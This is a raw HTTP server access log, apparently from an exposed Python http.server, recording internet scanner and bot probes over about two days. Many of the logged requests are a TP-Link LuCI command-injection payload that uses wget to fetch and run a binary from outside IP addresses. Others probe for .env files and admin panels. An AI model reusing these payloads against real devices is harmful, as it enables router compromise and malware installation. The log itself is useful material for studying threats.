107.170.245.9 - - [21/Apr/2024 20:55:14] "MGLNDD_203.219.129.101_80" 400 - 80.75.212.75 - - [21/Apr/2024 21:28:22] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [21/Apr/2024 21:28:22] "CONNECT www.google.com:443 HTTP/1.1" 501 - 185.191.126.213 - - [21/Apr/2024 21:34:46] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [21/Apr/2024 22:26:48] "GET / HTTP/1.1" 200 - 67.217.48.178 - - [21/Apr/2024 22:45:10] code 404, message File not found 67.217.48.178 - - [21/Apr/2024 22:45:10] "GET /Kvsh/c.php?server=1&type=1 HTTP/1.1" 404 - 142.4.218.114 - - [21/Apr/2024 23:39:51] "GET / HTTP/1.1" 200 - 198.199.111.96 - - [21/Apr/2024 23:40:09] code 404, message File not found 198.199.111.96 - - [21/Apr/2024 23:40:09] "GET /druid/index.html HTTP/1.1" 404 - 64.225.32.69 - - [21/Apr/2024 23:54:28] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00{\\x01\\x00\\x00w\\x03\\x03\\x87±ö\\x88\\x84öú\\x07\\x92º\\x82Y¸Ð̯m¥äÄl^\\x80\\x99\\x87\\x00ñaçdtd\\x00\\x00\\x1aÀ/À+À\\x11À\\x07À\\x13À') 64.225.32.69 - - [21/Apr/2024 23:54:28] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x87±ö\x88\x84öú\x07\x92º\x82Y¸Ð̯m¥äÄl^\x80\x99\x87\x00ñaçdtd\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 64.225.32.69 - - [21/Apr/2024 23:54:28] code 400, message Bad request version ('À\\x14À') 64.225.32.69 - - [21/Apr/2024 23:54:28] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03r\x7fö²-@e\x16#s4\x1e¿Å³þÈ\x8e¸\x9b\x18\x8då 'ø\x15ÝG{\x91]\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 64.225.32.69 - - [21/Apr/2024 23:54:28] "GET / HTTP/1.1" 200 - 64.225.32.69 - - [21/Apr/2024 23:54:29] code 404, message File not found 64.225.32.69 - - [21/Apr/2024 23:54:29] "GET /form.html HTTP/1.1" 404 - 64.225.32.69 - - [21/Apr/2024 23:54:29] code 404, message File not found 64.225.32.69 - - [21/Apr/2024 23:54:29] "GET /upl.php HTTP/1.1" 404 - 64.225.32.69 - - [21/Apr/2024 23:54:29] code 400, message Bad request version ('À\\x14À') 64.225.32.69 - - [21/Apr/2024 23:54:29] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x18o·ÿ\x17@[öaþJ<\x06ß$\x9cáçiö\x1f¯z\x1aÄËFpD\x19x\x7f\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 64.225.32.69 - - [21/Apr/2024 23:54:30] code 404, message File not found 64.225.32.69 - - [21/Apr/2024 23:54:30] "GET /geoip/ HTTP/1.1" 404 - 64.225.32.69 - - [21/Apr/2024 23:54:30] code 404, message File not found 64.225.32.69 - - [21/Apr/2024 23:54:30] "GET /favicon.ico HTTP/1.1" 404 - 64.225.32.69 - - [21/Apr/2024 23:54:30] code 404, message File not found 64.225.32.69 - - [21/Apr/2024 23:54:30] "GET /1.php HTTP/1.1" 404 - 64.225.32.69 - - [21/Apr/2024 23:54:31] code 404, message File not found 64.225.32.69 - - [21/Apr/2024 23:54:31] "GET /bundle.js HTTP/1.1" 404 - 64.225.32.69 - - [21/Apr/2024 23:54:31] code 404, message File not found 64.225.32.69 - - [21/Apr/2024 23:54:31] "GET /files/ HTTP/1.1" 404 - 64.225.32.69 - - [21/Apr/2024 23:54:31] code 404, message File not found 64.225.32.69 - - [21/Apr/2024 23:54:31] "GET /systembc/password.php HTTP/1.1" 404 - 64.225.32.69 - - [21/Apr/2024 23:54:32] code 404, message File not found 64.225.32.69 - - [21/Apr/2024 23:54:32] "GET /password.php HTTP/1.1" 404 - 64.225.32.69 - - [21/Apr/2024 23:54:32] code 404, message File not found 64.225.32.69 - - [21/Apr/2024 23:54:32] "GET /info.php HTTP/1.1" 404 - 213.32.39.47 - - [22/Apr/2024 00:05:25] "GET / HTTP/1.1" 200 - 67.217.48.178 - - [22/Apr/2024 00:06:55] code 404, message File not found 67.217.48.178 - - [22/Apr/2024 00:06:55] "GET /Kvsh/geti.php HTTP/1.1" 404 - 179.43.190.218 - - [22/Apr/2024 00:07:08] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 00:07:08] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 80.94.92.60 - - [22/Apr/2024 00:33:02] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [22/Apr/2024 00:33:47] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.94.145.100', 56968) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.145.100 - - [22/Apr/2024 00:35:54] "GET / HTTP/1.1" 200 - 167.94.145.100 - - [22/Apr/2024 00:35:58] "GET / HTTP/1.1" 200 - 167.94.145.100 - - [22/Apr/2024 00:36:00] code 505, message Invalid HTTP version (2.0) 167.94.145.100 - - [22/Apr/2024 00:36:00] "PRI * HTTP/2.0" 505 - 167.94.145.100 - - [22/Apr/2024 00:36:01] code 404, message File not found 167.94.145.100 - - [22/Apr/2024 00:36:01] "GET /favicon.ico HTTP/1.1" 404 - 185.142.236.43 - - [22/Apr/2024 00:55:52] "GET / HTTP/1.1" 200 - 185.142.236.43 - - [22/Apr/2024 00:55:55] code 404, message File not found 185.142.236.43 - - [22/Apr/2024 00:55:55] "GET /robots.txt HTTP/1.1" 404 - 185.142.236.43 - - [22/Apr/2024 00:55:56] code 404, message File not found 185.142.236.43 - - [22/Apr/2024 00:55:56] "GET /sitemap.xml HTTP/1.1" 404 - 185.142.236.43 - - [22/Apr/2024 00:55:57] code 404, message File not found 185.142.236.43 - - [22/Apr/2024 00:55:57] "GET /.well-known/security.txt HTTP/1.1" 404 - 185.142.236.43 - - [22/Apr/2024 00:55:59] code 404, message File not found 185.142.236.43 - - [22/Apr/2024 00:55:59] "GET /favicon.ico HTTP/1.1" 404 - 80.75.212.75 - - [22/Apr/2024 01:12:54] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [22/Apr/2024 01:12:54] "CONNECT www.google.com:443 HTTP/1.1" 501 - 5.196.102.70 - - [22/Apr/2024 01:36:31] code 404, message File not found 5.196.102.70 - - [22/Apr/2024 01:36:31] "GET /favicon.ico HTTP/1.1" 404 - 87.121.69.52 - - [22/Apr/2024 02:27:05] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [22/Apr/2024 02:27:05] "CONNECT google.com:443 HTTP/1.1" 501 - 179.43.190.218 - - [22/Apr/2024 02:57:28] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 02:57:28] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 177.185.157.202 - - [22/Apr/2024 03:39:10] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [22/Apr/2024 04:00:02] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [22/Apr/2024 04:04:13] "GET / HTTP/1.1" 200 - 5.196.102.71 - - [22/Apr/2024 04:33:34] code 404, message File not found 5.196.102.71 - - [22/Apr/2024 04:33:34] "GET /favicon.ico HTTP/1.1" 404 - 5.181.190.250 - - [22/Apr/2024 04:34:18] code 404, message File not found 5.181.190.250 - - [22/Apr/2024 04:34:18] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 80.75.212.75 - - [22/Apr/2024 05:05:57] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [22/Apr/2024 05:05:57] "CONNECT www.google.com:443 HTTP/1.1" 501 - 185.242.226.80 - - [22/Apr/2024 06:07:04] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [22/Apr/2024 06:19:21] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 06:19:21] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 44.220.188.44 - - [22/Apr/2024 06:55:36] "GET / HTTP/1.1" 200 - 198.235.24.25 - - [22/Apr/2024 07:39:49] "GET / HTTP/1.0" 200 - 109.205.213.198 - - [22/Apr/2024 07:54:42] "GET / HTTP/1.1" 200 - 198.199.98.149 - - [22/Apr/2024 07:59:56] code 404, message File not found 198.199.98.149 - - [22/Apr/2024 07:59:56] "GET /hudson HTTP/1.1" 404 - 198.199.108.16 - - [22/Apr/2024 08:04:40] code 404, message File not found 198.199.108.16 - - [22/Apr/2024 08:04:40] "GET /actuator/health HTTP/1.1" 404 - 87.121.69.52 - - [22/Apr/2024 08:31:49] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [22/Apr/2024 08:31:49] "CONNECT google.com:443 HTTP/1.1" 501 - 185.224.128.43 - - [22/Apr/2024 08:42:58] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [22/Apr/2024 08:52:59] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 08:52:59] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 141.98.11.128 - - [22/Apr/2024 09:07:18] "GET / HTTP/1.1" 200 - 20.251.144.86 - - [22/Apr/2024 09:39:57] code 404, message File not found 20.251.144.86 - - [22/Apr/2024 09:39:57] "GET /.env HTTP/1.1" 404 - 20.251.144.86 - - [22/Apr/2024 09:40:01] code 501, message Unsupported method ('POST') 20.251.144.86 - - [22/Apr/2024 09:40:01] "POST / HTTP/1.1" 501 - 5.181.190.250 - - [22/Apr/2024 10:24:10] code 404, message File not found 5.181.190.250 - - [22/Apr/2024 10:24:10] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 71.6.232.28 - - [22/Apr/2024 10:28:01] "GET / HTTP/1.1" 200 - 65.49.1.96 - - [22/Apr/2024 10:34:44] "GET / HTTP/1.1" 200 - 65.49.1.103 - - [22/Apr/2024 10:36:43] code 404, message File not found 65.49.1.103 - - [22/Apr/2024 10:36:43] "GET /favicon.ico HTTP/1.1" 404 - 65.49.1.107 - - [22/Apr/2024 10:37:24] code 404, message File not found 65.49.1.107 - - [22/Apr/2024 10:37:24] "GET /geoserver/web/ HTTP/1.1" 404 - 187.137.176.232 - - [22/Apr/2024 11:14:47] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [22/Apr/2024 11:37:29] code 404, message File not found 5.181.190.250 - - [22/Apr/2024 11:37:29] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 141.98.11.128 - - [22/Apr/2024 11:44:15] "GET / HTTP/1.1" 200 - 162.216.149.209 - - [22/Apr/2024 11:51:31] "GET / HTTP/1.1" 200 - 184.105.247.195 - - [22/Apr/2024 11:52:49] code 400, message Bad request version ('À\\x14À') 184.105.247.195 - - [22/Apr/2024 11:52:49] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03Q\x89\x9de\x11\x04Mk>\x05¼TÁ`Åè\x09\x1f¨Ý\x8eØyØvË¿\x1dòã ^\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - ---------------------------------------- Exception occurred during processing of request from ('206.168.34.124', 40030) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 206.168.34.124 - - [22/Apr/2024 12:05:31] "GET / HTTP/1.1" 200 - 206.168.34.124 - - [22/Apr/2024 12:05:35] "GET / HTTP/1.1" 200 - 206.168.34.124 - - [22/Apr/2024 12:05:35] code 505, message Invalid HTTP version (2.0) 206.168.34.124 - - [22/Apr/2024 12:05:35] "PRI * HTTP/2.0" 505 - 206.168.34.124 - - [22/Apr/2024 12:05:36] code 404, message File not found 206.168.34.124 - - [22/Apr/2024 12:05:36] "GET /favicon.ico HTTP/1.1" 404 - 192.155.90.220 - - [22/Apr/2024 12:14:28] code 400, message Bad request version ('À\\x14À') 192.155.90.220 - - [22/Apr/2024 12:14:28] "\x16\x03\x01\x00\x85\x01\x00\x00\x81\x03\x03¥læ'ÜÐ\x96,ß=f\x83ùQäÚÉgØÒ\x1e\x85Æàå\x87^{\x88\x15-Y\x00\x00 À/À0À+À,̨̩À\x13À\x09À\x14À" 400 - 192.155.90.220 - - [22/Apr/2024 12:37:41] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [22/Apr/2024 13:05:10] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 13:05:10] "GET login.cgi HTTP/1.1" 404 - 179.43.190.218 - - [22/Apr/2024 13:05:23] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 13:05:23] "GET /login.cgi HTTP/1.1" 404 - 179.43.190.218 - - [22/Apr/2024 13:05:35] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 13:05:35] "GET /login.cgi HTTP/1.1" 404 - 179.43.190.218 - - [22/Apr/2024 13:05:45] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 13:05:45] "GET /login.cgi HTTP/1.1" 404 - 179.43.190.218 - - [22/Apr/2024 13:06:01] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 13:06:01] "GET /login.cgi HTTP/1.1" 404 - 179.43.190.218 - - [22/Apr/2024 13:06:09] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 13:06:09] "GET /login.cgi HTTP/1.1" 404 - 179.43.190.218 - - [22/Apr/2024 13:06:24] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 13:06:24] "GET /login.cgi HTTP/1.1" 404 - 179.43.190.218 - - [22/Apr/2024 13:06:31] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 13:06:31] "GET /login.cgi HTTP/1.1" 404 - 179.43.190.218 - - [22/Apr/2024 13:06:39] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 13:06:39] "GET /login.cgi HTTP/1.1" 404 - 179.43.190.218 - - [22/Apr/2024 13:06:48] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 13:06:48] "GET /login.cgi HTTP/1.1" 404 - 179.43.190.218 - - [22/Apr/2024 13:06:55] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 13:06:55] "GET /login.cgi HTTP/1.1" 404 - 193.106.29.125 - - [22/Apr/2024 14:03:28] "GET / HTTP/1.0" 200 - 83.97.73.245 - - [22/Apr/2024 14:10:52] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 185.224.128.43 - - [22/Apr/2024 14:26:37] "GET / HTTP/1.1" 200 - 185.16.38.111 - - [22/Apr/2024 14:41:39] "GET / HTTP/1.1" 200 - 46.174.191.30 - - [22/Apr/2024 15:03:25] "GET / HTTP/1.0" 200 - 162.243.136.67 - - [22/Apr/2024 15:10:21] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [22/Apr/2024 15:35:09] code 404, message File not found 83.97.73.245 - - [22/Apr/2024 15:35:09] "GET /actuator/gateway/routes HTTP/1.1" 404 - 103.38.182.146 - - [22/Apr/2024 15:35:24] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [22/Apr/2024 15:50:08] code 404, message File not found 5.181.190.250 - - [22/Apr/2024 15:50:08] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 194.169.175.33 - - [22/Apr/2024 16:00:12] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 194.169.175.33 - - [22/Apr/2024 16:00:12] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 179.43.190.218 - - [22/Apr/2024 16:27:09] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 16:27:09] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 67.217.48.178 - - [22/Apr/2024 16:42:21] code 501, message Unsupported method ('POST') 67.217.48.178 - - [22/Apr/2024 16:42:21] "POST /Kvsh/login/index_main.php HTTP/1.1" 501 - 185.191.126.213 - - [22/Apr/2024 16:44:07] "GET / HTTP/1.1" 200 - 78.153.140.179 - - [22/Apr/2024 16:54:54] code 404, message File not found 78.153.140.179 - - [22/Apr/2024 16:54:54] "GET /.env HTTP/1.1" 404 - 78.153.140.179 - - [22/Apr/2024 16:54:54] code 400, message Bad request version ('\\x00\\x9eÀ(À$À\\x14À') 78.153.140.179 - - [22/Apr/2024 16:54:54] "\x16\x03\x01\x00Þ\x01\x00\x00Ú\x03\x03\x9dúÒð8åø<\x0c\x8c\x11]où\x09GÔïDâZÞ¯Hþ\x99Ó¡\x03\x05\x849\x00\x00nÀ0À,À2À.À/À+À1À-\x00¥\x00£\x00¡\x00\x9f\x00¤\x00¢\x00 \x00\x9eÀ(À$À\x14À" 400 - 67.217.48.178 - - [22/Apr/2024 17:09:14] code 404, message File not found 67.217.48.178 - - [22/Apr/2024 17:09:14] "GET /Kvsh/c.php?server=1&type=1 HTTP/1.1" 404 - 67.217.48.178 - - [22/Apr/2024 17:40:08] code 404, message File not found 67.217.48.178 - - [22/Apr/2024 17:40:08] "GET /Kvsh/geti.php HTTP/1.1" 404 - 164.92.81.234 - - [22/Apr/2024 17:55:06] code 404, message File not found 164.92.81.234 - - [22/Apr/2024 17:55:06] "GET /.well-known/probing.txt HTTP/1.1" 404 - 141.98.11.128 - - [22/Apr/2024 18:05:04] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [22/Apr/2024 18:37:58] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [22/Apr/2024 18:38:01] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [22/Apr/2024 18:50:24] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [22/Apr/2024 19:13:07] code 404, message File not found 179.43.190.218 - - [22/Apr/2024 19:13:07] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 141.98.11.128 - - [22/Apr/2024 19:49:58] "GET / HTTP/1.1" 200 - 35.228.199.198 - - [22/Apr/2024 19:58:01] code 400, message Bad request version ('+') 35.228.199.198 - - [22/Apr/2024 19:58:01] "\x16\x03\x01\x00M\x01\x00\x00I\x03\x03Ó\x0f\x83@ \x0bÖ(¸?þ0ÝÏLêÀ¡q\x84W´£qM¤t¶sR#Þ \x80VêÑ,vcwâÖ¡.¶\x15ä:\x09+" 400 - 35.228.199.198 - - [22/Apr/2024 19:58:03] code 501, message Unsupported method ('OPTIONS') 35.228.199.198 - - [22/Apr/2024 19:58:03] "OPTIONS / HTTP/1.0" 501 - 141.98.11.128 - - [22/Apr/2024 20:12:57] "GET / HTTP/1.1" 200 - 66.240.236.109 - - [22/Apr/2024 20:32:08] "GET / HTTP/1.1" 200 - 162.243.137.10 - - [22/Apr/2024 20:42:22] code 404, message File not found 162.243.137.10 - - [22/Apr/2024 20:42:22] "GET /druid/index.html HTTP/1.1" 404 - 87.121.69.52 - - [22/Apr/2024 20:46:35] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [22/Apr/2024 20:46:35] "CONNECT google.com:443 HTTP/1.1" 501 - 138.68.208.42 - - [22/Apr/2024 20:58:46] code 404, message File not found 138.68.208.42 - - [22/Apr/2024 20:58:46] "GET /hudson HTTP/1.1" 404 - 205.210.31.241 - - [22/Apr/2024 21:19:15] code 400, message Bad request version ('À\\x13À') 205.210.31.241 - - [22/Apr/2024 21:19:15] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03õ\x15fe;ÅÕ\x84'c¾_0j\x1a K\x9f3\x91ÓoÞ6Ð\x91Td9ølb ¦½\x82ñ·¯2yÁm\x8dn \x93ª\x03U0èÿÖ»¦ØìÄ!\x01\x85cþ¾\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 205.210.31.241 - - [22/Apr/2024 21:19:16] code 400, message Bad request version ('À(À$À\\x14À') 205.210.31.241 - - [22/Apr/2024 21:19:16] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03\x07q3NP5tÉ ×¢Ío¹;C\x0cfH\x80vn×D±Zææ¯S~\x05\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 109.205.213.198 - - [22/Apr/2024 21:24:54] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [22/Apr/2024 21:29:34] code 404, message File not found 5.181.190.250 - - [22/Apr/2024 21:29:34] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 141.98.11.128 - - [22/Apr/2024 21:36:32] "GET / HTTP/1.1" 200 - 178.128.84.187 - - [22/Apr/2024 21:39:22] code 404, message File not found 178.128.84.187 - - [22/Apr/2024 21:39:22] "GET /aaa9 HTTP/1.1" 404 - 178.128.84.187 - - [22/Apr/2024 21:39:23] code 404, message File not found 178.128.84.187 - - [22/Apr/2024 21:39:23] "GET /aab8 HTTP/1.1" 404 - 178.128.84.187 - - [22/Apr/2024 21:39:25] "GET / HTTP/1.1" 200 - 34.78.249.41 - - [22/Apr/2024 21:49:58] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [22/Apr/2024 21:56:14] "GET / HTTP/1.1" 200 - 179.43.191.18 - - [22/Apr/2024 22:07:24] code 404, message File not found 179.43.191.18 - - [22/Apr/2024 22:07:24] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 - 107.170.229.43 - - [22/Apr/2024 22:26:50] code 404, message File not found 107.170.229.43 - - [22/Apr/2024 22:26:50] "GET /manager/text/list HTTP/1.1" 404 - 80.94.92.60 - - [22/Apr/2024 23:00:00] "GET / HTTP/1.1" 200 - 194.50.16.190 - - [22/Apr/2024 23:00:08] "GET / HTTP/1.1" 200 - 94.103.183.79 - - [22/Apr/2024 23:12:40] "GET / HTTP/1.1" 200 - 194.169.175.40 - - [22/Apr/2024 23:27:56] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 194.169.175.40 - - [22/Apr/2024 23:27:56] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 67.217.48.178 - - [22/Apr/2024 23:34:42] code 404, message File not found 67.217.48.178 - - [22/Apr/2024 23:34:42] "GET /Kvsh/geti.php HTTP/1.1" 404 - 67.217.48.178 - - [22/Apr/2024 23:34:43] code 404, message File not found 67.217.48.178 - - [22/Apr/2024 23:34:43] "GET /Kvsh/c.php?server=1&type=1 HTTP/1.1" 404 - 67.217.48.178 - - [22/Apr/2024 23:34:43] code 501, message Unsupported method ('POST') 67.217.48.178 - - [22/Apr/2024 23:34:43] "POST /Kvsh/login/index_main.php HTTP/1.1" 501 - 185.224.128.43 - - [22/Apr/2024 23:41:33] "GET / HTTP/1.1" 200 - 51.195.193.133 - - [23/Apr/2024 00:04:48] code 404, message File not found 51.195.193.133 - - [23/Apr/2024 00:04:48] "GET /.env HTTP/1.1" 404 - 51.195.193.133 - - [23/Apr/2024 00:04:48] code 501, message Unsupported method ('POST') 51.195.193.133 - - [23/Apr/2024 00:04:48] "POST / HTTP/1.1" 501 - 141.98.11.128 - - [23/Apr/2024 00:10:34] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [23/Apr/2024 00:18:16] "GET / HTTP/1.1" 200 - 78.153.140.177 - - [23/Apr/2024 00:55:17] code 404, message File not found 78.153.140.177 - - [23/Apr/2024 00:55:17] "GET /.env HTTP/1.1" 404 - 78.153.140.177 - - [23/Apr/2024 00:55:17] code 400, message Bad request version ('ý~\\x99Ä\\x00b\\x13\\x02\\x13\\x03\\x13\\x01À,À0À+À/̨̩\\x00£\\x00\\x9f\\x00¢\\x00\\x9e̪À¯À\\xadÀ$À(À') 78.153.140.177 - - [23/Apr/2024 00:55:17] "\x16\x03\x01\x01H\x01\x00\x01D\x03\x03vÿvN\x9dÊ5¿\x86Ùïr\x7fYö÷S\x0e\x91§é\x9fz®Xõ\x0enÁ\x06Ñ2 ow\x8d^sz$ÐP\x8dÃÍ&Rä\x06\x800²·_d\x01\x8aéÁ\x00\x1eý~\x99Ä\x00b\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩\x00£\x00\x9f\x00¢\x00\x9e̪À¯À­À$À(À" 400 - 141.98.11.128 - - [23/Apr/2024 01:36:29] "GET / HTTP/1.1" 200 - 179.43.191.18 - - [23/Apr/2024 01:40:28] code 404, message File not found 179.43.191.18 - - [23/Apr/2024 01:40:28] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 - 5.181.190.250 - - [23/Apr/2024 01:46:25] code 404, message File not found 5.181.190.250 - - [23/Apr/2024 01:46:25] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 179.43.190.218 - - [23/Apr/2024 01:53:52] code 404, message File not found 179.43.190.218 - - [23/Apr/2024 01:53:52] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 103.203.57.1 - - [23/Apr/2024 01:58:12] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [23/Apr/2024 02:12:44] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [23/Apr/2024 02:25:27] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [23/Apr/2024 02:25:27] "CONNECT google.com:443 HTTP/1.1" 501 - 185.242.226.10 - - [23/Apr/2024 02:51:05] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [23/Apr/2024 03:12:15] "GET / HTTP/1.1" 200 - 80.94.92.60 - - [23/Apr/2024 03:16:54] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [23/Apr/2024 03:29:06] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.94.138.127', 38342) Traceback (most recent call last): File 